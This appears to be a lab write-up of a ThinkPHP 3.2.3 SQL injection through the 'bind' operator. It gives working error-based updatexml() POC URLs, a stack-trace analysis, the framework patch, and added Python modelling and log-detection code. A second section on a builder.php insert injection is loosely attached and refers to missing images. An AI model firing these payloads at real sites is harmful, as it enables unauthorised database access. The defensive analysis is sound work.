thinkphp builder.php SQL Injection Vulnerability (<= 3.2.3)
ref:https://www.jianshu.com/p/18d06277161e
Timeshu, 2018.04.21 02:03
thinkphp builder.php SQL Injection Vulnerability <= 3.2.3: a vulnerability reproduction exercise
-------------------------------------------------------------
1. Enter the Docker environment. Start the Docker service (service docker start); docker ps lists the running containers; docker exec -it 9b96ee2b /bin/bash opens a shell in the container (9b96ee2b is the container id).
2. Actual debug stack and parameter passing. Inside the container, /var/www/html# more index.php shows the entry file. Turn on debug mode there (recommended during development; comment it out or set it to false for deployment; it makes logs easy to print):
define('APP_DEBUG', true);
The following is a debug analysis of the update injection, based on the Docker environment provided by Timeshu.
This is the POC:
http://192.168.3.6/home/index/readcategorymsg?category[0]=bind&category[1]=0%20and (updatexml(1,concat(0x7e,(user())),0))
category is an array:
0: "bind"
1: "0 and (updatexml(1,concat(0x7e,(user())),0)"
Error stack information:
#0 /var/www/html/ThinkPHP/Library/Think/Db/Driver.class.php: E('1105:XPATH synt...')
#1 /var/www/html/ThinkPHP/Library/Think/Db/Driver.class.php(237): Think\Db\Driver->error()
#2 /var/www/html/ThinkPHP/Library/Think/Db/Driver.class.php(906): Think\Db\Driver->execute('UPDATE `vulapps...', false)
The SQL that was executed:
UPDATE `vulapps_message` SET `is_read`='1' WHERE `category`='1' and (updatexml(1,concat(0x7e,(user())),0))
Although the first condition (category='1') is false, the updatexml() expression after it is still evaluated, so MySQL reports: XPATH syntax error: '[email protected]'.
In /var/www/html/ThinkPHP/Library/Think/Db/Driver.class.php(906), public function update($data, $options) sends the SQL statement with:
return $this->execute($sql, !empty($options['fetch_sql']) ? true : false);
At that point $sql is:
UPDATE `vulapps_message` SET `is_read`=:0 WHERE `category`=:0 and (updatexml(1,concat(0x7e,(user())),0))
Vulnerability code (Driver.class.php, parseWhereItem):

```php
protected function parseWhereItem($key, $val) { // $key='category', $val=array(2){[0]=>"bind", [1]=>"0 and (updatexml(1,concat(0x7e,(user())),0)"}
    if (is_array($val)) {
        if (is_string($val[0])) {
            $exp = strtolower($val[0]); // $exp = 'bind'
            if (preg_match('/^(eq|neq|gt|egt|lt|elt)$/', $exp)) {
                // comparison operators, omitted here
            } elseif ('bind' == $exp) {
                // $whereStr becomes "category = :0 and (updatexml(...))": the ":0" is spliced into the SQL text,
                // which is what creates the opportunity at the later PDO parameter replacement step.
                $whereStr .= $key . ' = :' . $val[1];
            }
            // ... remaining branches omitted ...
```

Here you can see that when the where value is an array whose first element is bind, the concatenation is done directly. Looking at the filtering restrictions in the I() function, we find that they do not exclude bind.
#3 /var/www/html/ThinkPHP/Library/Think/Model.class.php(451): Think\Db\Driver->update(Array, Array)
$result = $this->db->update($data, $options);
var_dump($data) and var_dump($options) give:
array(1) { ["is_read"]=> int(1) }
array(3) { ["where"]=> array(1) { ["category"]=> array(2) { [0]=> string(4) "bind" [1]=> string "0 and (updatexml(1,concat(0x7e,(user())),0)" } } ["table"]=> string() "vulapps_message" ["model"]=> string(7) "Message" }
#4 /var/www/html/Application/Home/Controller/IndexController.class.php: Think\Model->save(Array)

```php
public function readcategorymsg() {
    $condition['category'] = I("category"); // user input goes straight into the where condition
    $data['is_read'] = 1;
    $res = M("message")->where($condition)->save($data);
    echo var_dump($condition['category']) . "<br>";
}
```

var_dump($condition['category']) outputs:
array(2) { [0]=> string(4) "bind" [1]=> string "0 and (updatexml(1,concat(0x7e,(user())),0)" }
#5 [internal function]: Home\Controller\IndexController->readcategorymsg()
#6 /var/www/html/ThinkPHP/Library/Think/App.class.php(173):
Patch method: add bind filtering to the I() function, via think_filter():

```php
function think_filter(&$value) {
    // Filter special query keywords: a bare operator name gets a trailing space appended,
    // so it no longer matches the operator branches in parseWhereItem().
    if (preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN|BIND)$/i', $value)) {
        $value .= ' ';
    }
}
```
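To make the chain above concrete, here is an added Python model (not ThinkPHP's own code, and not from the original post) of the three pieces the write-up walks through: I() with and without the think_filter() patch, the bind branch of parseWhereItem(), and the UPDATE assembly with placeholder binding. The inputs are constructed to match the POC array and a normal "Mark read" click; the scalar_category() helper is an assumed caller-side hardening, not something the framework provides. It shows where the attacker-controlled text lands (SQL text versus bind list) in each configuration.

```python
import re

# Constructed inputs, not taken from the page: what ThinkPHP's I("category") hands to the
# controller for the write-up's POC query string, and for a normal click on "Mark read".
INJECTED_CATEGORY = ["bind", "0 and (updatexml(1,concat(0x7e,(user())),0))"]
NORMAL_CATEGORY = "system message"

# Operator keyword list from the patched think_filter() shown above
OPERATOR_RE = re.compile(
    r"^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN|BIND)$",
    re.I,
)


def think_filter(value):
    """Model of the patched think_filter(): a bare operator keyword gets a trailing space."""
    return value + " " if isinstance(value, str) and OPERATOR_RE.match(value) else value


def i_function(param, patched):
    """Model of I(): after the patch, think_filter() is applied to every element of an array."""
    if not patched:
        return param
    return [think_filter(v) for v in param] if isinstance(param, list) else think_filter(param)


def parse_where_item(key, val, bind):
    """Model of Driver::parseWhereItem() for a plain value and for the 'bind' operator branch."""
    if isinstance(val, list):
        exp = val[0].lower()
        if exp == "bind":
            # val[1] is spliced into the SQL text as the placeholder name: this is the defect
            return key + " = :" + val[1]
        # any other (unknown) operator: 3.2.3 stops with an _EXPRESS_ERROR_ exception
        raise ValueError("_EXPRESS_ERROR_:" + val[0])
    # plain value: only a generated placeholder reaches the SQL text, the value is bound
    name = ":" + str(len(bind))
    bind[name] = val
    return key + " = " + name


def build_update(where, data, patched):
    """Assemble the UPDATE the way the stack trace shows (SET placeholders are bound first).
    Returns (sql_text, bind_values)."""
    bind = {}
    set_parts = []
    for col, v in data.items():
        name = ":" + str(len(bind))
        bind[name] = v
        set_parts.append("`" + col + "`=" + name)
    where_parts = [parse_where_item("`" + k + "`", i_function(v, patched), bind) for k, v in where.items()]
    return "UPDATE `vulapps_message` SET " + ", ".join(set_parts) + " WHERE " + " AND ".join(where_parts), bind


def payload_reaches_sql_text(category, patched):
    """True when attacker-controlled text ends up in the SQL string rather than in the bind list;
    a request rejected by the where builder counts as not reaching it."""
    try:
        sql, bind = build_update({"category": category}, {"is_read": 1}, patched)
    except ValueError:
        return False
    return "updatexml" in sql


def scalar_category(param):
    """Assumed caller-side hardening, independent of the framework patch: the controller accepts
    only a single string for category, so an operator array never reaches where()."""
    if not isinstance(param, str):
        raise ValueError("category must be a single string")
    return param


if __name__ == "__main__":
    print(build_update({"category": INJECTED_CATEGORY}, {"is_read": 1}, patched=False)[0])
    print(build_update({"category": NORMAL_CATEGORY}, {"is_read": 1}, patched=True))
```

Unpatched, the model reproduces the SQL from the stack trace: the SET placeholder is :0, and the bind branch reuses that same :0 followed by the rest of the attacker's string as raw SQL. With the patch, "bind" becomes "bind " and the builder rejects it as an unknown operator; the caller-side check is the defence that does not depend on keeping the keyword list complete.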
-------------------------------------------------------------
Vulnerability Environment: Docker
Vulnerability Analysis
First, we know that the insert method has a vulnerability, so let us look at its specific implementation.
The method is located in the thinkphp\library\think\db\builder.php file. We can see that the parseData method is called at the beginning of the function with $data as its parameter, and the value of $data is the array-type data passed in by our GET request, such as:
We follow the parseData method, which is also in the thinkphp\library\think\db\builder.php file.
As you can see, there is a switch statement at the end; after entering it, execution jumps to case 'inc', where the key question is whether $this->parseKey filters the $val[1] variable,
because the $val[1] variable is the updatexml(1,concat(0x7,user(),0x7e),1) from our payload, as shown:
Continuing into the parseKey method, you will find that the incoming $key is returned directly, without any filtering.
Let us go back to the insert method, add a debug statement, and see what the SQL statement looks like:
The injection in the update function is similar to this insert one.
Using Docker to build the vulnerability environment
1. Pull the image:
docker pull medicean/vulapps:t_thinkphp_1
2. Start the environment:
docker run -d -p 80:80 medicean/vulapps:t_thinkphp_1
In -p 80:80 the first 80 is the port on the physical host and can be chosen freely.
Use and exploitation
Access http://192.168.0.104:80/ (assuming the container was started on port 80).
The environment has been built successfully.
Click "Mark read"; with Burp you can capture the request URL:
http://192.168.0.104/Home/Index/readcategorymsg?category=%E7%B3%BB%E7%BB%9F%E6%B6%88%E6%81%AF
The vulnerable parameter is category=%E7%B3%BB%E7%BB%9F%E6%B6%88%E6%81%AF (the URL-encoded UTF-8 of 系统消息, "system message").
POC:
http://192.168.0.104/home/index/readcategorymsg?category[0]=bind&category[1]=0 and (updatexml(1,concat(0x7e,(user())),0))
With the POC above the database user name is obtained directly.
Database user name leaked through the error: [email protected]
http://192.168.0.104/home/index/readcategorymsg?category[0]=bind&category[1]=0 and (updatexml(1,concat(0x7e,(database())),0))
Through database(), the error echoes back the current database name: vulapps
http://192.168.0.104/home/index/readcategorymsg?category[0]=bind&category[1]=0 and (updatexml(1,concat(0x7e,(version())),0))
Database version leaked through the error: 5.5.57-0ubuntu0.14.04.1
I looked up some information online but still don't really understand this; I wanted to construct a statement to see whether the database account and password could be obtained, but found that it could not be used (embarrassing).
I don't fully understand the POC above; I can only see that by modifying the user() part here you can get the database user and version.
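From the defender's side, the requests above leave a recognisable trace in the web server's access log: a condition array whose element [0] is a ThinkPHP where-operator keyword, and an error-based function call in the query string. The following is an added Python detector (not part of the original post, and not a ThinkPHP component) that scans combined-format access-log lines for both signals; the log lines are constructed for the example and mirror the benign and POC URLs shown above, with the bracket-encoded variant included because clients and proxies often send [ and ] as %5B and %5D.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Where-operator keywords ThinkPHP 3.2 accepts as the first element of a condition array
# (the same list the patched think_filter() screens for)
TP_OPERATORS = {"exp", "neq", "gt", "egt", "lt", "elt", "or", "xor", "like", "notlike",
                "not between", "notbetween", "between", "notin", "not in", "in", "bind"}
# MySQL error-based functions the write-up's payloads use to leak values through the error message
ERROR_FUNC_RE = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
ARRAY_PARAM_RE = re.compile(r"^(\w+)\[(\d+)\]$")
LOG_LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample access-log lines (combined log format), not captured from any real server
SAMPLE_LOG = """\
192.168.0.50 - - [21/Apr/2018:02:03:10 +0800] "GET /Home/Index/readcategorymsg?category=%E7%B3%BB%E7%BB%9F%E6%B6%88%E6%81%AF HTTP/1.1" 200 512
192.168.0.51 - - [21/Apr/2018:02:03:11 +0800] "GET /home/index/readcategorymsg?category[0]=bind&category[1]=0%20and%20(updatexml(1,concat(0x7e,(user())),0)) HTTP/1.1" 500 1024
192.168.0.52 - - [21/Apr/2018:02:03:12 +0800] "GET /home/index/readmsg?ids[0]=12&ids[1]=15 HTTP/1.1" 200 512
192.168.0.53 - - [21/Apr/2018:02:03:13 +0800] "GET /home/index/readcategorymsg?category%5B0%5D=bind&category%5B1%5D=0%20and%20(updatexml(1,concat(0x7e,(database())),0)) HTTP/1.1" 500 1024
"""


def inspect_query(query):
    """Return the suspicious signals found in one query string (parse_qsl decodes names and values)."""
    signals = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        m = ARRAY_PARAM_RE.match(name)
        if m and m.group(2) == "0" and value.strip().lower() in TP_OPERATORS:
            signals.append("where-operator keyword '%s' supplied as %s[0]" % (value, m.group(1)))
        f = ERROR_FUNC_RE.search(value)
        if f:
            signals.append("error-based function %s() in parameter %s" % (f.group(1).lower(), name))
    return signals


def scan_log(text):
    """Scan access-log lines; return one finding per request that carries at least one signal."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        client, when, target, status = m.groups()
        parts = urlsplit(target)
        signals = inspect_query(parts.query)
        if signals:
            findings.append({"client": client, "time": when, "path": parts.path,
                             "status": int(status), "signals": signals})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["status"], f["path"], "; ".join(f["signals"]))
```

A legitimate array parameter such as ids[0]=12 produces no signal because its first element is not an operator keyword, so the rule keys on the framework's own operator list rather than on brackets alone; the HTTP 500 status is reported alongside because a successful error-based probe shows up as a server error in the same log line.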
Resources:
https://mp.weixin.qq.com/s/lNaH2-AAtk9JVKbbCBeIRA
https://mp.weixin.qq.com/s/4xXS7usHMFNgDTEHcHBcBA